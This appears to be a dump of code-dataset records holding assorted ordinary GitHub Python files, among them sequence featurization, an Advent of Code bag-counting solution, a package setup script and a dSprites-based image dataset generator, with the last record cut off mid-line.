provided\r\n # in the alphabet\r\n retval = np.stack([seq_arr == char for char in alphabet]).astype(float).T\r\n assert len(retval) == len(seq), f\"Mismatched lengths: {len(seq)} {retval.shape}\"\r\n return retval.astype(np.float32).T\r\n\r\n\r\ndef idx_encode(\r\n seq: str, alphabet_idx: Dict[str, int] = AMINO_ACIDS_WITH_ALL_ADDITIONAL_TO_IDX\r\n) -> np.ndarray:\r\n \"\"\"\r\n Encode the sequence as the indices in the alphabet\r\n >>> idx_encode(\"CAFEVVGQLTF\")\r\n array([ 9, 13, 18, 4, 14, 14, 11, 8, 16, 6, 18], dtype=int32)\r\n \"\"\"\r\n retval = np.array([alphabet_idx[aa] for aa in seq], dtype=np.int32)\r\n return retval\r\n\r\n\r\ndef pad_or_trunc_sequence(seq: str, l: int, right_align: bool = False, pad=PAD) -> str:\r\n \"\"\"\r\n Pad the given sequence to the given length\r\n >>> pad_or_trunc_sequence(\"RKDES\", 8, right_align=False)\r\n 'RKDES$$$'\r\n >>> pad_or_trunc_sequence(\"RKDES\", 8, right_align=True)\r\n '$$$RKDES'\r\n >>> pad_or_trunc_sequence(\"RKDESRKRKR\", 3, right_align=False)\r\n 'RKD'\r\n >>> pad_or_trunc_sequence(\"RKDESRRK\", 3, right_align=True)\r\n 'RRK'\r\n \"\"\"\r\n delta = len(seq) - l\r\n if len(seq) > l:\r\n if right_align:\r\n retval = seq[delta:]\r\n else:\r\n retval = seq[:-delta]\r\n elif len(seq) < l:\r\n insert = pad * np.abs(delta)\r\n if right_align:\r\n retval = insert + seq\r\n else:\r\n retval = seq + insert\r\n else:\r\n retval = seq\r\n assert len(retval) == l, f\"Got mismatched lengths: {len(retval)} {l}\"\r\n return retval\r\n\r\n\r\ndef is_whitespaced(seq: str) -> bool:\r\n \"\"\"\r\n Return whether the sequence has whitespace inserted\r\n >>> is_whitespaced(\"R K D E S\")\r\n True\r\n >>> is_whitespaced(\"RKDES\")\r\n False\r\n >>> is_whitespaced(\"R K D ES\")\r\n False\r\n >>> is_whitespaced(\"R\")\r\n True\r\n >>> is_whitespaced(\"RK\")\r\n False\r\n >>> is_whitespaced(\"R K\")\r\n True\r\n \"\"\"\r\n tok = list(seq)\r\n spaces = [t for t in tok if t.isspace()]\r\n if len(spaces) == floor(len(seq) / 2):\r\n return True\r\n return False\r\n\r\n\r\ndef insert_whitespace(seq: str) -> str:\r\n \"\"\"\r\n Return the sequence of characters with whitespace after each char\r\n >>> insert_whitespace(\"RKDES\")\r\n 'R K D E S'\r\n \"\"\"\r\n return \" \".join(list(seq))\r\n\r\n\r\ndef remove_whitespace(seq: str) -> str:\r\n \"\"\"\r\n Remove whitespace from the given sequence\r\n >>> remove_whitespace(\"R K D E S\")\r\n 'RKDES'\r\n >>> remove_whitespace(\"R K D RR K\")\r\n 'RKDRRK'\r\n >>> remove_whitespace(\"RKIL\")\r\n 'RKIL'\r\n \"\"\"\r\n return \"\".join(seq.split())\r\n\r\n\r\n@cache\r\ndef all_possible_kmers(alphabet: Iterable[str] = AMINO_ACIDS, k: int = 3) -> List[str]:\r\n \"\"\"\r\n Return all possible kmers\r\n \"\"\"\r\n return [\"\".join(k) for k in itertools.product(*[alphabet for _ in range(k)])]\r\n\r\n\r\n@lru_cache(maxsize=128)\r\ndef kmer_ft(\r\n seq: str, k: int = 3, size_norm: bool = False, alphabet: Iterable[str] = AMINO_ACIDS\r\n) -> np.ndarray:\r\n \"\"\"\r\n Kmer featurization to sequence\r\n \"\"\"\r\n kmers = [seq[i : i + k] for i in range(0, len(seq) - k + 1)]\r\n kmers_to_idx = {\r\n k: i for i, k in enumerate(all_possible_kmers(alphabet=alphabet, k=k))\r\n }\r\n kmers = [k for k in kmers if k in kmers_to_idx]\r\n idx = np.array([kmers_to_idx[k] for k in kmers])\r\n retval = np.zeros(len(kmers_to_idx))\r\n np.add.at(retval, idx, 1)\r\n assert np.sum(retval) == len(kmers)\r\n if size_norm:\r\n retval /= len(kmers)\r\n return retval\r\n\r\n\r\ndef main():\r\n \"\"\"On the fly testing\"\"\"\r\n np.random.seed(123456)\r\n print(mask_for_training(insert_whitespace(\"RKDES\")))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import doctest\r\n\r\n doctest.testmod()\r\n main()\r\n","repo_name":"yanismiraoui/M4R-dash","sub_path":"featurization.py","file_name":"featurization.py","file_ext":"py","file_size_in_byte":11431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74948610064","text":"import sqlite3\n\nfrom sqlite3 import Error\n\n\ndef sql_connection():\n try:\n\n con = sqlite3.connect('local_police.db')\n return con\n\n except Error:\n\n print(Error)\n\n\ndef sql_table(con):\n cursorObj = con.cursor()\n # cursorObj.execute('insert into data VALUES(1,0,\" \"))')\n cursorObj.execute(\n \"CREATE TABLE IF NOT EXISTS police_station(id int AUTO_INCREMENT, rank varchar(10), incharge_name varchar(32), station_name varchar(50), state varchar(32), city varchar(32), area varchar(32), postalcode int, primary key(id))\")\n a = cursorObj.execute(\"SELECT station_name FROM police_station\")\n return a.fetchall()\n","repo_name":"harshidkoladara/Online-Police-Complain-System","sub_path":"mainconnection.py","file_name":"mainconnection.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34704347520","text":"import numpy as np\r\n\r\ndt = 0.1\r\n\r\ndef cubic_spiral(theta_i, theta_f,n=10):\r\n x = np.linspace(0, 1, num=n)\r\n return (theta_f-theta_i)*(-2*x**3 + 3*x**2) + theta_i\r\n \r\ndef straight(dist, curr_pose, radius, num_st_pts = 10):\r\n # the straight-line may be along x or y axis\r\n #curr_theta will determine the orientation\r\n x0, y0, t0 = curr_pose\r\n xf, yf = x0 + dist*np.cos(t0), y0 + dist*np.sin(t0)\r\n x = (xf - x0) * np.linspace(0, 1, num_st_pts) + x0\r\n y = (yf - y0) * np.linspace(0, 1, num_st_pts) + y0\r\n return x, y, t0*np.ones_like(x)\r\n\r\ndef turn(change, curr_pose, radius, num_turn_pts = 50):\r\n # adjust scaling constant for desired turn radius\r\n x0, y0, t0 = curr_pose\r\n theta = cubic_spiral(t0, t0 + np.deg2rad(change), num_turn_pts)\r\n x= x0 + np.cumsum(np.cos(theta)*dt*radius/3)\r\n y= y0 + np.cumsum(np.sin(theta)*dt*radius/3)\r\n return x, y, theta\r\n\r\ndef generate_trajectory(route, init_pose = (0, 0,np.pi/2),radius = 0.5):\r\n curr_pose = init_pose\r\n func = {'straight': straight, 'turn': turn}\r\n x, y, t = np.array([]), np.array([]),np.array([])\r\n for manoeuvre, command in route:\r\n px, py, pt = func[manoeuvre](command, curr_pose, radius)\r\n curr_pose = px[-1],py[-1],pt[-1]\r\n x = np.concatenate([x, px])\r\n y = np.concatenate([y, py])\r\n t = np.concatenate([t, pt])\r\n \r\n return np.vstack([x, y, t])\r\n\r\ndef get_route(path,radius = 0.5):\r\n path_list = np.array(path) \r\n route = []\r\n segment = ['straight',1-radius]\r\n \r\n for i in range(len(path_list)-2):\r\n x1,y1 = path_list[i][0],path_list[i][1]\r\n x2,y2 = path_list[i+1][0],path_list[i+1][1]\r\n x3,y3 = path_list[i+2][0],path_list[i+2][1]\r\n check = ((x1-x2)*(y3-y2) - (x3-x2)*(y2-y1))\r\n if check == 0:\r\n segment[1] += 1\r\n\r\n else:\r\n route.append(tuple(segment))\r\n segment[0] = 'turn'\r\n \r\n if check>0:\r\n if x1 == x2:\r\n segment[1] = 90\r\n else:\r\n segment[1] = -90 \r\n else:\r\n if x1 == x2:\r\n segment[1] = -90 \r\n else:\r\n segment[1] = 90\r\n \r\n route.append(tuple(segment))\r\n segment = ['straight',1-2*radius] \r\n \r\n segment[1] += radius\r\n route.append(tuple(segment))\r\n return route ","repo_name":"naveenmoto/lablet102","sub_path":"project/submissions/kshitij/trajectory.py","file_name":"trajectory.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2706170756","text":"\n\"\"\"A ‘launcher’ window that gives a simple choice between different sub-apps and maybe recently used files (like LibreOffice does if you start it directly)\"\"\"\n\nfrom . import main\nimport wx\n\nclass LauncherWin(main.CDSWin):\n title = \"Conlang Development Suite\"\n def build(self):\n # this is not at all pretty, but for testing, it will do.\n phonologyButton = wx.Button(self.frame, label=\"Phonology\")\n dictionaryButton = wx.Button(self.frame, label=\"Dictionary\")\n ## other apps\n \n self.frame.Sizer = wx.BoxSizer(wx.VERTICAL)\n self.frame.Sizer.Add(phonologyButton, wx.EXPAND)\n self.frame.Sizer.Add(dictionaryButton, wx.EXPAND)\n \n def onButton(windowType):\n # Return a button click event handler\n def handler(event):\n wx.GetApp().newWindow(windowType)\n self.frame.Close()\n return handler\n self.frame.Bind(wx.EVT_BUTTON, onButton(\"phonology\"), phonologyButton)\n self.frame.Bind(wx.EVT_BUTTON, onButton(\"dictionary\"), dictionaryButton)","repo_name":"kylanbb/Conlang-Development-Suite","sub_path":"src/common/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44013383124","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"item\", views.ItemView.as_view()),\n path(\"get-all-items\", views.get_all_items),\n path(\"delete-item/\", views.delete_item),\n path(\"add-item\", views.add_item),\n]\n","repo_name":"nickav2004/simple-cart-app","sub_path":"mhs/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32125837197","text":"f = open(\"spiciesURL.txt\",\"r\")\ng = open(\"spedictionary.txt\",\"r\")\nh = open(\"dictionaryfinal.txt\",\"w\")\n\nA = f.readlines()\nB = g.readlines()\n\nLA = len(A)\nLB = len(B)\n\nh.write(B[0]+str(B[1]).replace(\"\\n\",\"\")+\"\\t\"+\"Biosample\"+\"\\t\"+\"Bioproject\"+\"\\n\")\n\nfor i in range(0,LA):\n a = A[i].split(\"\\t\")\n for j in range(2,LB):\n b = B[j].split(\"\\t\")\n if a[0] == b[0]:\n h.write(str(B[j]).replace(\"\\n\",\"\")+\"\\t\"+a[2]+\"\\t\"+a[1]+\"\\n\")\n\n# 다운로드 과정에서 만들어진 spedictionary.txt에Biosample, Bioproject 정보를\n# 추가로 넣어주는 코드\n\nf.close()\ng.close()\nh.close()\n","repo_name":"limchanyoung1116/probiotics-geneticfeature","sub_path":"genome/5. genomenumbering/makedic.py","file_name":"makedic.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24133866090","text":"eggs_start = int(input())\neggs_counter = 0\neggs_num_last = 0\neggs_are_finished = False\nis_closed = False\nwhile True:\n command = input()\n if command == \"Close\":\n is_closed = True\n break\n eggs_number = int(input())\n if command == \"Buy\":\n eggs_counter += eggs_number\n else:\n eggs_start += eggs_number\n if eggs_counter > eggs_start:\n eggs_num_last = eggs_number\n eggs_are_finished = True\n break\ndiff = abs(eggs_start - eggs_counter)\nif is_closed:\n print(\"Store is closed!\")\n print(f\"{eggs_counter} eggs sold.\")\nif eggs_are_finished:\n print(\"Not enough eggs in store!\")\n print(f\"You can buy only {eggs_num_last - diff}.\")","repo_name":"1van101/SoftUni-Software-Engineering","sub_path":"python_basics/exams/20_and_21_april_2019/easter_shop.py","file_name":"easter_shop.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15121042615","text":"#!python3\n\nfrom collections import defaultdict\nimport re\n\nINPUT = 'day07.txt'\n\nTEST_INPUT = '''light red bags contain 1 bright white bag, 2 muted yellow bags.\ndark orange bags contain 3 bright white bags, 4 muted yellow bags.\nbright white bags contain 1 shiny gold bag.\nmuted yellow bags contain 2 shiny gold bags, 9 faded blue bags.\nshiny gold bags contain 1 dark olive bag, 2 vibrant plum bags.\ndark olive bags contain 3 faded blue bags, 4 dotted black bags.\nvibrant plum bags contain 5 faded blue bags, 6 dotted black bags.\nfaded blue bags contain no other bags.\ndotted black bags contain no other bags.\n'''\n\nTEST_INPUT2 = '''shiny gold bags contain 2 dark red bags.\ndark red bags contain 2 dark orange bags.\ndark orange bags contain 2 dark yellow bags.\ndark yellow bags contain 2 dark green bags.\ndark green bags contain 2 dark blue bags.\ndark blue bags contain 2 dark violet bags.\ndark violet bags contain no other bags.\n'''\n\nPATTERN = r'(\\d+)\\s(\\w+\\s\\w+)'\nBAG = re.compile(PATTERN)\n\n\ndef parse_contents(contents):\n '''\n Parse string of form\n 1 bright white bag, 2 muted yellow bags\n to a dict\n {'bright white': 1, 'muted yellow': 2}\n '''\n bags = {}\n for m in re.finditer(PATTERN, contents):\n n = int(m.group(1))\n bags[m.group(2)] = n\n return bags\n\n\ndef get_input(input):\n contains = {}\n for line in input.strip().split('\\n'):\n bag, contents = line.split(' contain ')\n bag = bag.rsplit(' ', 1)[0]\n c = parse_contents(contents)\n contains[bag] = c\n return contains\n\n\ndef get_reverse(bags):\n '''Reverses the relationship in `get_input`.'''\n result = defaultdict(list)\n for bag, contents in bags.items():\n for b in contents.keys():\n result[b].append(bag)\n return result\n\n\ndef is_contained_in_count(bag, reverse_bags):\n '''Part 1 counter.\n\n Just a simple search algorithm.\n '''\n to_check = reverse_bags[bag]\n seen = set()\n while to_check:\n item = to_check.pop()\n if item in seen:\n continue\n seen.add(item)\n for b in reverse_bags[item]:\n to_check.append(b)\n return len(seen)\n\n\ndef contains_count_helper(bag, count, bags):\n others = bags[bag]\n if not others:\n yield 0\n for b, c in others.items():\n yield count * c\n yield from contains_count_helper(b, count * c, bags)\n\n\ndef contains_count(bag, bags):\n '''Part 2 counter.'''\n return sum(contains_count_helper(bag, 1, bags))\n\n\ndef test1(bags):\n reverse_bags = get_reverse(bags)\n c = is_contained_in_count('shiny gold', reverse_bags)\n assert c == 4\n\n\ndef part1(bags):\n reverse_bags = get_reverse(bags)\n return is_contained_in_count('shiny gold', reverse_bags)\n\n\ndef test2(bags1, bags2):\n n = contains_count('shiny gold', bags1)\n assert n == 32\n\n n = contains_count('shiny gold', bags2)\n assert n == 126\n\n\ndef part2(bags):\n return contains_count('shiny gold', bags)\n\n\ndef main():\n bags = get_input(open(INPUT, 'r').read())\n test_bags_1 = get_input(TEST_INPUT)\n test_bags_2 = get_input(TEST_INPUT2)\n\n test1(test_bags_1)\n\n p = part1(bags)\n print(p)\n\n test2(test_bags_1, test_bags_2)\n\n p = part2(bags)\n print(p)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PreludeAndFugue/AdventOfCode","sub_path":"2020/python/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37599793586","text":"from PIL import Image, ImageOps\nimport math\nimport os, os.path\n\nclass LedwallImageCreator:\n def __init__(self,picdir):\n self.picdir = picdir\n\n def compute(self, pixel):\n r,g,b,a = pixel\n if a == 0:\n return 0\n #val = round(math.sqrt(math.pow(r,2) + math.pow(g,2) + math.pow(b,2)) )\n val = 0.299*r + 0.587*g + 0.114*b\n if val < 1.0:\n val = 1\n return val\n\n def processImages(self):\n for root, dirs, files in os.walk(self.picdir):\n for i in dirs:\n pass\n #retDirs.append(os.path.join(root,i))\n self.outputText = '#ifndef ANIMATION_H\\n#define ANIMATION_H\\n' \n myFiles =[]\n for imFile in files:\n if '.png' in imFile:\n self.processImage(imFile) \n self.outputText +='#endif'\n fp = open('animation.h','wb')\n fp.write(self.outputText)\n fp.close()\n\n def processImage(self,fileName):\n imPath = os.path.join(self.picdir,fileName)\n print ('imPath', imPath)\n im = Image.open(imPath)\n w,h = im.size\n im = ImageOps.mirror(im)\n pix = im.load()\n output = []\n for i in range(64*32):\n output.append(0)\n if w != 32:\n print('invalid image width, should be 32 px')\n if h != 64:\n print('invalid image height, should be 64 px')\n for y in range(64):\n for x in range(32):\n pixelVal = pix[x,y]\n val = int(round(self.compute(pixelVal)))\n output[y*32+x] = val\n\n frameName = fileName.split('.')[0]\n self.outputText += 'static unsigned int '+frameName+'[2048] = {'\n for val in output:\n self.outputText += str(val)+', '\n\n self.outputText = self.outputText[:-2]+'};\\n'\n \n \nif __name__ == '__main__':\n lwImCr = LedwallImageCreator('images')\n lwImCr.processImages()\n\n","repo_name":"fullscreennl/led-mirror","sub_path":"software/scripts/ledwall_image_creator.py","file_name":"ledwall_image_creator.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"1495299473","text":"class Solution:\n def checkIfPangram(self, sentence: str) -> bool:\n if(len(sentence)<26):\n return False\n my_set=set()\n for i in range(len(sentence)):\n my_set.add(sentence[i])\n return len(my_set)==26\n \n ","repo_name":"AsmaKacem1/Leetcode","sub_path":"1832-check-if-the-sentence-is-pangram/1832-check-if-the-sentence-is-pangram.py","file_name":"1832-check-if-the-sentence-is-pangram.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73067580307","text":"def h():\n print(\"你好\")\n yield 5\n print(\"再见\")\n\n\nfor n in h():\n print(n)\n\n\ndef h():\n print(\"Wen Chuan\")\n m = yield 5 # Fighting!\n print(m)\n d = yield 12\n print('We are together!')\n\n\nc = h()\nc.__next__() # 相当于c.send(None)\nc.send('Fighting!') # (yield 5)表达式被赋予了'Fighting!'\n\n\ndef h1():\n print('houshuai')\n m = yield 5 # Fighting!\n print(m)\n d = yield 12\n print('We are together!')\n\n\nc = h1()\nm = c.__next__() # m 获取了yield 5 的参数值 5\nd = c.send('Fighting!') # d 获取了yield 12 的参数值12\nprint('We will never forget the date', m, '.', d)\n","repo_name":"LikeRainDay/TensorFlow","sub_path":"Test/TestPython.py","file_name":"TestPython.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29304769782","text":"#!/usr/bin/env python3\n\"\"\"Setup script. Used by easy_install and pip.\"\"\"\n\nimport os\nfrom setuptools import setup, find_packages\n\nBASE_PATH = os.path.dirname(os.path.abspath(__file__))\nSRC_PATH = os.path.join(BASE_PATH, \"src\")\nPACKAGES = find_packages(where=SRC_PATH)\n\nNAME = 'HartreeParticleDSL'\nAUTHOR = (\"Aidan Chalk \")\nAUTHOR_EMAIL = 'aidan.chalk@stfc.ac.uk'\nURL = 'https://github.com/NYI'\nDOWNLOAD_URL = 'https://github.com/NYI'\nDESCRIPTION = ('HartreeParticleDSL - A Generic Particle DSL supporting a variety of backends')\nLONG_DESCRIPTION = '''\\\nTBD\n'''\nLICENSE = ' TBD '\n\nCLASSIFIERS = [\n 'Development Status :: 3 - Alpha',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Science/Research',\n 'Natural Language :: English',\n 'Programming Language :: Python',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Software Development',\n 'Topic :: Utilities',\n 'Operating System :: POSIX',\n 'Operating System :: Unix']\n\nVERSION = '0.0.1a'\n\nif __name__ == '__main__':\n\n def get_files(directory, install_path, valid_suffixes):\n '''Utility routine that creates a list of 2-tuples, each consisting of\n the target installation directory and a list of files\n (specified relative to the project root directory).\n\n :param str directory: the directory containing the required files.\n :param str install_path: the location where the files will be placed.\n :param valid_suffixes: the suffixes of the required files.\n :type valid_suffixes: [str]\n\n :returns: a list of 2-tuples, each consisting of the target \\\n installation directory and a list of files (specified relative \\\n to the project root directory).\n :rtype: [(str, [str])]\n\n '''\n examples = []\n for dirpath, _, filenames in os.walk(directory):\n if (\"__\" not in dirpath) and filenames:\n rel_path = os.path.relpath(dirpath, directory)\n files = []\n for filename in filenames:\n if any([filename.endswith(suffix) for\n suffix in valid_suffixes]):\n files.append(\n os.path.join(os.path.basename(install_path),\n rel_path, filename))\n if files:\n examples.append((os.path.join(install_path, rel_path),\n files))\n return examples\n\n # We have all of the example, tutorial and wrapper libraries files\n # listed in MANIFEST.in but unless we specify them in the data_files\n # argument of setup() they don't seem to get installed.\n # Since the data_files argument doesn't accept wildcards we have to\n # explicitly list every file we want.\n # INSTALL_PATH controls where the files will be installed.\n # VALID_SUFFIXES controls the type of files to include.\n\n EGS_DIR = os.path.join(BASE_PATH, \"examples\")\n INSTALL_PATH = os.path.join(\"share\", \"HartreeParticleDSL\", \"examples\")\n VALID_SUFFIXES = [\"90\", \"py\", \"md\", \".c\", \".cl\", \"Makefile\", \".mk\", \"cpp\", \"hpp\"]\n EXAMPLES = get_files(EGS_DIR, INSTALL_PATH, VALID_SUFFIXES)\n\n LIBS_DIR = os.path.join(BASE_PATH, \"lib\")\n INSTALL_PATH = os.path.join(\"share\", \"HartreeParticleDSL\", \"lib\")\n VALID_SUFFIXES = [\"90\", \"sh\", \"py\", \"md\", \"Makefile\", \".mk\",\n \".jinja\", \"doxyfile\", \"cpp\", \"hpp\"]\n LIBS = get_files(LIBS_DIR, INSTALL_PATH, VALID_SUFFIXES)\n setup(\n name=NAME,\n version=VERSION,\n author=AUTHOR,\n author_email=(AUTHOR_EMAIL),\n license=LICENSE,\n url=URL,\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n classifiers=CLASSIFIERS,\n packages=PACKAGES,\n package_dir={\"\": \"src\"},\n package_data = {\"\" : [\"*.hpp\", \"*.cpp\"]},\n install_requires=['pyparsing', 'six'],\n extras_require={\n 'dag': [\"graphviz\"],\n 'doc': [\"sphinx\", \"sphinxcontrib.bibtex < 2.0.0\",\n \"sphinx_rtd_theme\", \"autoapi\"],\n 'psydata': [\"Jinja2\"],\n 'test': [\"pep8\", \"pylint\", \"pytest-cov\", \"pytest-pep8\",\n \"pytest-pylint\", \"pytest-flakes\", \"pytest-pep257\"],\n },\n include_package_data=True,\n# scripts=['bin/psyclone', 'bin/genkernelstub', 'bin/psyad'],\n data_files=LIBS\n )\n\n","repo_name":"stfc/HartreeParticleDSL","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6557274221","text":"\"\"\" \nThis demonstrates how to use the image.h5 file\ntogether with the index file keypoints.h5\n\nto write images to png subfolder\n\"\"\"\n\n\nimport contextlib\nimport os\nimport h5py\nfrom imageio import imwrite\nfrom tqdm import tqdm\n\nclass cfg:\n step=224\n\ndef clip_image_from_keypoionts(image, keypoints, step, output):\n\n for dsname in keypoints:\n print(keypoints[dsname])\n k = 0\n for i,j in tqdm(keypoints[dsname][:]):\n imagename = \"-\".join(dsname.split(\"-\")[:-1])\n img = image[imagename][slice(i, i + step),slice(j, j + step),:]\n\n if (img.shape == (step,step,3)):\n imwrite(f\"{output}/after_{i}_{j}_{k}.png\",img)\n k += 1\n\nif __name__ == \"__main__\":\n \n # png folder\n output = \"collapsed_png\"\n if not os.path.exists(output):\n os.makedirs(output)\n\n # image h5\n image = h5py.File(\"after_earthquake_example.h5\")\n # keypoints h5\n keypoints = h5py.File(\"collapsed-keypoints.h5\")\n\n clip_image_from_keypoionts(image, keypoints, cfg.step, output)\n\n image.close()\n keypoints.close()","repo_name":"Wjppppp/ClipFinetuner","sub_path":"data/03_generate_png.py","file_name":"03_generate_png.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12631727312","text":"\"\"\"\nCode for generation of the CdSprites+ dataset.\n\nThis code is adapted from https://github.com/yordanh/interp_latent_spaces featuring dSprites with color, published as a paper\n\"Interpretable Latent Spaces for Learning from Demonstration\".\nWe changed some functions, added textures to the shapes and backgrounds and also added natural language captions.\nWe also created 5 difficulty levels.\n\nOriginal code: https://github.com/yordanh/interp_latent_spaces/blob/master/src/preprocess_dsprites.py\nauthor :Yordan Hristov \ndate :05/2018\npython_version :2.7.14\n\nModification:\nauthor :Gabriela Sejnova \ndate :05/2023\npython_version :3.8\n==============================================================================\n\"\"\"\n\nimport numpy as np\nimport cv2\nimport numpy, random\nimport argparse\nimport os, glob\nimport shutil\nimport itertools\nimport copy\nimport json\nimport wget\nimport tarfile\nimport h5py\n\ndsprites_path = \"./dsprites_ndarray_co1sh3sc6or40x32y32_64x64.npz\"\nif not os.path.exists(dsprites_path):\n url = 'https://data.ciirc.cvut.cz/public/groups/incognite/CdSprites/dsprites_ndarray_co1sh3sc6or40x32y32_64x64.npz'\n wget.download(url)\nparser = argparse.ArgumentParser(description='Process the dSprited dataset.')\nparser.add_argument('--image_size', default=64, type=int, help='Width and height of the images in px.')\nparser.add_argument('--level', default=0, type=int, help='If you only want to generate one level of the dataset')\n\n\n\nclass ConfigParser(object):\n def __init__(self, filename):\n file = open(filename, \"r\")\n self.config = json.load(file)\n\n def parse_specs(self):\n specs = {'train': [], \"unseen\":[]}\n specs['train'] = self.config['data_generation']['train']['spec']\n # for record in self.config['data_generation']['unseen']:\n # specs['unseen'].append((record['label'], record['spec']))\n return specs\n\ndef change_brightness(img, value=30, increase=True):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n h, s, v = cv2.split(hsv)\n\n if increase:\n lim = 255 - value\n v[v > lim] = 255\n v[v <= lim] += value\n else:\n lim = 0 + value\n v[v < lim] = 0\n v[v <= lim] -= value\n\n final_hsv = cv2.merge((h, s, v))\n img = cv2.cvtColor(final_hsv, cv2.COLOR_HSV2BGR)\n return img\n\ndef colorize_background(image, texture):\n ### Replaces black pixels in the image with the background texture\n tex = cv2.resize(texture, image.shape[:2])\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n mask = gray_image == 0\n out = cv2.bitwise_and(tex, tex, image, mask.astype(np.uint8))\n outp = cv2.normalize(out, dst=None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8U)\n return outp\n\ndef colorize_texture(texture, rgb):\n ### Takes the loaded texture image (RGB, 0-255) and changes color based on the RGB array (0-255)\n texture = texture_to_bnw(texture, shade=\"light\")\n return texture * rgb/255\n\ndef texture_to_bnw(texture, shade=None):\n tex = cv2.cvtColor(texture, cv2.COLOR_BGR2GRAY)\n tex = numpy.tile(tex.reshape(tex.shape[0], tex.shape[1], 1), (1, 1, 3))\n outp = cv2.normalize(tex, dst=None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8U)\n if shade is not None:\n if shade == \"light\":\n outp = change_brightness(outp, 125)\n else:\n outp = change_brightness(outp, 200, increase=False)\n return outp\n\ndef make_textured_shape(image, texture):\n ### Takes the input RGB image with black background and adds the colored texture to the shape\n out = image * cv2.resize(texture, image.shape[:2])\n outp = cv2.normalize(out, dst=None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8U)\n return outp\n\ndef prep_dir(folder_name):\n print(\"Preparing \" + folder_name)\n if os.path.exists(folder_name):\n print(\"Cleaning \" + folder_name)\n map(lambda object_folder: shutil.rmtree(folder_name + object_folder), os.listdir(folder_name))\n print(folder_name + \" has been cleaned!\")\n else:\n os.makedirs(folder_name)\n\n\n# extracts images for a single label - e.g big and blue in the label group big_blue\ndef extract(folder_name=None, labels=None, args=None, latent_spec=None, image_size=None, verbose=False):\n print(\"Extracting images for \" + folder_name + str(labels))\n if \"position\" not in latent_spec.keys():\n x_pose = latent_spec['x']\n y_pose = latent_spec['y']\n else:\n x_pose = latent_spec['position'][0]\n y_pose = latent_spec['position'][1]\n indices = []\n for i, c in enumerate(data['latents_classes']):\n if (c[1] in latent_spec['shape'] and\n c[2] in latent_spec['scale'] and\n c[3] in latent_spec['orientation'] and\n c[4] in x_pose and\n c[5] in y_pose):\n indices.append(i)\n\n random.shuffle(indices)\n images = numpy.take(data['imgs'], indices[:sample_num], axis=0)\n\n for i, image in enumerate(images):\n image = cv2.resize(image, (image_size, image_size))\n\n for bgr_color in latent_spec[\"color\"]:\n if len(latent_spec[\"textured\"]) == 0:\n image_out = numpy.tile(image.reshape(image_size, image_size, 1), (1, 1, 3)) * bgr_color\n image_out = cv2.cvtColor(image_out.astype(np.uint8), cv2.COLOR_BGR2RGB)\n else:\n if \"shapes\" in latent_spec[\"textured\"]:\n t = random.randint(0, len(textures)-1)\n image_out = make_textured_shape(numpy.tile(image.reshape(image_size, image_size, 1), (1, 1, 3)), colorize_texture(textures[t], bgr_color))\n if \"background\" in latent_spec[\"textured\"]:\n image_out = colorize_background(image_out, texture_to_bnw(random.choice(textures), shade=labels[-1].split(\"_\")[-1]))\n image_out = cv2.cvtColor(image_out, cv2.COLOR_BGR2RGB)\n object_folder_name = folder_name + \"_\".join(labels) + \"/\"\n cv2.imwrite(object_folder_name + \"/\" + str(label_counters[\"_\".join(labels)]) + \".png\", image_out)\n label_counters[\"_\".join(labels)] += 1\n\n if verbose:\n cv2.imshow(\"image\", image_out)\n cv2.waitKey()\n\n if i % 100 == 0:\n print(\"{0} images have been processed so far.\".format(i))\n print(label_counters)\n\n\n# extracts symbols for a label group - e.g big_blue\ndef extract_label_groups(label_groups=None, unseen=None, latent_spec=None, mappings=None, folder_name=None, args=None):\n # build up the labels for all objects - take the combinations of the\n # lists in label_groups\n textured = label_groups[\"textured\"]\n label_groups.pop(\"textured\")\n if len(textured) > 0 and not \"level3\" in cfg:\n label_groups[\"position\"] = [\"at_top_right\", 